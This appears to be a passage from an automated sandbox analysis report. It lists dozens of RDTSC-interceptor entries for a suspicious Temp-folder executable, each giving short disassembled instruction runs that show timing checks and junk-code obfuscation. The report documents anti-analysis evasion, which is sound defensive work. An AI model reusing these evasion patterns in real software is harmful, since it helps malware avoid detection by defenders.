Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 914719 second address: 91471E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 915834 second address: 915838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 915838 second address: 9158A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ebx, 4AB97091h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FEE851EFD88h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov ebx, 34B53C63h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FEE851EFD88h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d add dword ptr [ebp+122D288Eh], eax 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007FEE851EFD86h 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9158A3 second address: 9158AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9129EC second address: 9129F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9129F0 second address: 9129FA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 91392D second address: 913932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911CB6 second address: 911CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911CC4 second address: 911CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918820 second address: 91882A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 916A91 second address: 916B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FEE851EFD88h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push ebx 0x00000012 jns 00007FEE851EFD88h 0x00000018 pop edi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 and ebx, dword ptr [ebp+122D2A3Dh] 0x0000002d mov ebx, dword ptr [ebp+122D2F73h] 0x00000033 mov eax, dword ptr [ebp+122D171Dh] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FEE851EFD88h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 movzx edi, si 0x00000056 push FFFFFFFFh 0x00000058 jmp 00007FEE851EFD99h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007FEE851EFD94h 0x00000066 pushad 0x00000067 popad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 916B29 second address: 916B33 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE84E88FCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920CFF second address: 920D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920D03 second address: 920D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007FEE84E88FC6h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jnp 00007FEE84E88FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920D24 second address: 920D4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE851EFD86h 0x00000008 jmp 00007FEE851EFD96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007FEE851EFD86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C1399 second address: 8C13A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEE84E88FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13A4 second address: 8C13B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13B3 second address: 8C13B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13B7 second address: 8C13D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEE851EFD8Eh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13D7 second address: 8C13DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13DF second address: 8C13E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13E3 second address: 8C13EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920487 second address: 9204BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FEE851EFD92h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD97h 0x00000012 jng 00007FEE851EFD86h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9204BD second address: 9204C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920613 second address: 920619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9189FC second address: 918A13 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEE84E88FCBh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918A13 second address: 918A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918A17 second address: 918AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1843h], edi 0x00000015 or ebx, dword ptr [ebp+122D1BFEh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jmp 00007FEE84E88FCDh 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FEE84E88FC8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D1701h] 0x0000004e push FFFFFFFFh 0x00000050 jmp 00007FEE84E88FD0h 0x00000055 nop 0x00000056 jg 00007FEE84E88FD8h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jl 00007FEE84E88FDDh 0x00000065 jmp 00007FEE84E88FD7h 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92D663 second address: 92D668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBC6 second address: 92DBD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FEE84E88FC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBD7 second address: 92DBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEE851EFD86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBE2 second address: 92DBEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE7C second address: 92DE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE80 second address: 92DE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE86 second address: 92DE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDEFC second address: 8BDF2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE84E88FCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FEE84E88FD0h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF2A second address: 8BDF32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF32 second address: 8BDF39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF08 second address: 8BDF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007FEE851EFD90h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932ABA second address: 932ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE84E88FD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEE84E88FCBh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C3D second address: 932C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C41 second address: 932C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C45 second address: 932C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEE851EFD8Fh 0x0000000e jns 00007FEE851EFD97h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEE851EFD95h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9334BB second address: 9334E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE84E88FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEE84E88FCCh 0x0000000f jo 00007FEE84E88FC6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93392E second address: 93393A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352D0 second address: 9352D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352D4 second address: 9352F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE851EFD86h 0x00000008 jns 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FEE851EFD92h 0x00000016 jp 00007FEE851EFD86h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352F2 second address: 9352F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352F6 second address: 9352FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352FB second address: 93533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD7h 0x00000009 pop eax 0x0000000a jo 00007FEE84E88FC8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FEE84E88FD5h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93533D second address: 935347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 935347 second address: 93534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93534C second address: 935356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 935356 second address: 935366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93BA8F second address: 93BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DF1 second address: 906DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DF5 second address: 906DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DFB second address: 906E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906F7A second address: 906F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9070F0 second address: 907101 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907101 second address: 907106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907106 second address: 90710C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90710C second address: 907110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907110 second address: 907114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907114 second address: 90712B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 sub dword ptr [ebp+1248E981h], ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90712B second address: 907130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907130 second address: 907142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD8Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907474 second address: 907487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE84E88FCBh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907487 second address: 9074F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FEE851EFD88h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3862h] 0x0000002c mov dword ptr [ebp+12473258h], ebx 0x00000032 and edx, 1B74CB03h 0x00000038 push 00000004h 0x0000003a jmp 00007FEE851EFD98h 0x0000003f nop 0x00000040 pushad 0x00000041 jmp 00007FEE851EFD8Eh 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9074F2 second address: 9074FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9074FE second address: 907502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BA4 second address: 907BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEE84E88FCAh 0x0000000a popad 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+1249B6EDh] 0x00000012 mov cx, di 0x00000015 mov edi, dword ptr [ebp+122D2D85h] 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BCA second address: 907BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE851EFD93h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BE5 second address: 907C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEE84E88FD6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FEE84E88FC8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b lea eax, dword ptr [ebp+1249B6A9h] 0x00000031 mov di, cx 0x00000034 nop 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FEE84E88FCAh 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907C53 second address: 907C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907C57 second address: 8E517F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FEE84E88FCDh 0x0000000d nop 0x0000000e call dword ptr [ebp+122D59E6h] 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C263 second address: 93C267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C267 second address: 93C28C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCCh 0x00000007 jne 00007FEE84E88FC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 jnp 00007FEE84E88FC8h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
